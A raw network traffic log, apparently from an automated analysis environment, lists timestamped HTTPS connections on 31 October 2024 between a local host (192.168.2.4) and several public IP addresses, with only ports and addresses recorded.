Oct 31, 2024 19:19:25.491812944 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:25.494559050 CET	49781	443	192.168.2.4	64.233.167.156
Oct 31, 2024 19:19:25.494584084 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:25.494671106 CET	49781	443	192.168.2.4	64.233.167.156
Oct 31, 2024 19:19:25.495035887 CET	49781	443	192.168.2.4	64.233.167.156
Oct 31, 2024 19:19:25.495052099 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:25.497339010 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:25.497355938 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:25.497420073 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:25.497925997 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:25.497941971 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:25.498230934 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:25.498258114 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:25.498326063 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:25.498739004 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:25.498758078 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:25.591464043 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.592133999 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.592144966 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.593607903 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.593684912 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.594237089 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.594319105 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.594645977 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.594655037 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.606700897 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.606959105 CET	49773	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.606966972 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.606997967 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.607139111 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.607148886 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.607336998 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.608107090 CET	49773	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.608174086 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.608223915 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.608284950 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.608328104 CET	49773	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.608762026 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.608827114 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.608865023 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.642745018 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.651333094 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.651348114 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.739556074 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.739567995 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.841418982 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.841449976 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.841516972 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.841531038 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.843861103 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.843900919 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.844075918 CET	443	49774	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.844125032 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.844151020 CET	49774	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.845155001 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.859052896 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.859070063 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.859117985 CET	49773	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.859129906 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.859507084 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.859530926 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.859580994 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.859600067 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.859643936 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.860622883 CET	49773	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.860661030 CET	443	49773	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.860759020 CET	49773	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.864833117 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.864873886 CET	443	49772	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:25.864928007 CET	49772	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:25.994617939 CET	49672	443	192.168.2.4	173.222.162.32
Oct 31, 2024 19:19:25.994651079 CET	443	49672	173.222.162.32	192.168.2.4
Oct 31, 2024 19:19:26.115098953 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.115277052 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.121834040 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.121854067 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.122232914 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.141519070 CET	49778	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.141537905 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.141956091 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.142075062 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.142585039 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.142657042 CET	49778	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.149933100 CET	49778	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.150002003 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.150011063 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.150405884 CET	49778	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.150419950 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.191356897 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.238749027 CET	49778	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.274557114 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.274712086 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.274754047 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.274760962 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.274777889 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.274820089 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.274827957 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.275402069 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.275450945 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.275460005 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.275652885 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.275696039 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.275710106 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.277782917 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.277852058 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.277887106 CET	49778	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.277905941 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.277971029 CET	49778	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.294781923 CET	49778	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.294804096 CET	443	49778	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.343756914 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.343770027 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.346087933 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:26.346332073 CET	49781	443	192.168.2.4	64.233.167.156
Oct 31, 2024 19:19:26.346369982 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:26.347362995 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:26.347421885 CET	49781	443	192.168.2.4	64.233.167.156
Oct 31, 2024 19:19:26.348715067 CET	49781	443	192.168.2.4	64.233.167.156
Oct 31, 2024 19:19:26.348778963 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:26.348925114 CET	49781	443	192.168.2.4	64.233.167.156
Oct 31, 2024 19:19:26.365115881 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.366353035 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:26.366362095 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.366410017 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.367202044 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.367219925 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.367878914 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.367933035 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:26.367939949 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.368016005 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:26.368597984 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.368664026 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.371217966 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:26.371298075 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.371362925 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.371400118 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.372170925 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:26.372179031 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.372523069 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.372642040 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.372829914 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.372839928 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.391824007 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.391871929 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.391871929 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.391885042 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.391927958 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.391937971 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.392133951 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.392265081 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.392271996 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.392553091 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.392587900 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.392627954 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.392633915 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.392644882 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.392684937 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.392693043 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.392735958 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.393506050 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.393580914 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.393621922 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.393659115 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.393668890 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.393676996 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.393697977 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.394542933 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.394596100 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.394602060 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.394609928 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.394654036 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.394695997 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.394702911 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.394742966 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.395329952 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:26.447951078 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:26.447952986 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.509314060 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.509397984 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.509429932 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.509471893 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.509469032 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.509497881 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.509516001 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.510737896 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.510746956 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.510770082 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.510797024 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.510812998 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.510840893 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.510862112 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.511588097 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.511641979 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.511663914 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.511672974 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.511689901 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.511693954 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.511710882 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.511744976 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.540067911 CET	49777	443	192.168.2.4	151.101.193.229
Oct 31, 2024 19:19:26.540096045 CET	443	49777	151.101.193.229	192.168.2.4
Oct 31, 2024 19:19:26.555341959 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:26.555433035 CET	49781	443	192.168.2.4	64.233.167.156
Oct 31, 2024 19:19:26.590754032 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:26.594054937 CET	49781	443	192.168.2.4	64.233.167.156
Oct 31, 2024 19:19:26.594099998 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:26.594218016 CET	443	49781	64.233.167.156	192.168.2.4
Oct 31, 2024 19:19:26.594263077 CET	49781	443	192.168.2.4	64.233.167.156
Oct 31, 2024 19:19:26.619437933 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.619477034 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.619488001 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.619544029 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:26.619569063 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.619618893 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:26.624345064 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.624414921 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.624474049 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:26.637310028 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.637362957 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.637406111 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.637414932 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.637449980 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.637593031 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.637638092 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.645828962 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.645879030 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.654588938 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.654647112 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.654680967 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.654748917 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.695496082 CET	49782	443	192.168.2.4	185.15.59.240
Oct 31, 2024 19:19:26.695534945 CET	443	49782	185.15.59.240	192.168.2.4
Oct 31, 2024 19:19:26.754786015 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.754857063 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.754910946 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.754961967 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.754978895 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.755027056 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.757071972 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.757126093 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.757157087 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.757210016 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.761540890 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.761594057 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.770153999 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.770205975 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.770231009 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.770283937 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.781408072 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.781631947 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.787657022 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.796428919 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.796468973 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.796499014 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.796504021 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.796516895 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.796555996 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.805066109 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.805149078 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.805162907 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.871757984 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.871798992 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.871809006 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.871820927 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.871896029 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.871928930 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.871939898 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.872142076 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.872185946 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.872195005 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.872236013 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.872446060 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.874284029 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.874320984 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.874362946 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.874382973 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.874396086 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.874418974 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.874430895 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.874481916 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.874490023 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.878989935 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.879038095 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.879051924 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.880108118 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.880243063 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.880251884 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.886070967 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.886133909 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.886142969 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.895193100 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.895235062 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.895234108 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.895248890 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.895334005 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.896322012 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.901638985 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.901673079 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.901678085 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.901686907 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.901729107 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.906959057 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.912367105 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.912410975 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.912412882 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.912425995 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.912504911 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.917665005 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.923106909 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.923147917 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.923154116 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.923162937 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.923233986 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.928271055 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.933649063 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.933695078 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.933703899 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.939021111 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.939084053 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.939093113 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.975672960 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.975758076 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.975769997 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.988941908 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.989008904 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.989029884 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.989068985 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.989176989 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.989185095 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.989603043 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.989643097 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.989650965 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.989690065 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.989720106 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.989729881 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.989738941 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.989919901 CET	49783	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:26.990439892 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.990519047 CET	443	49783	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:26.990561008 CET	443	49783	142.250.185.142	192.168.2.4
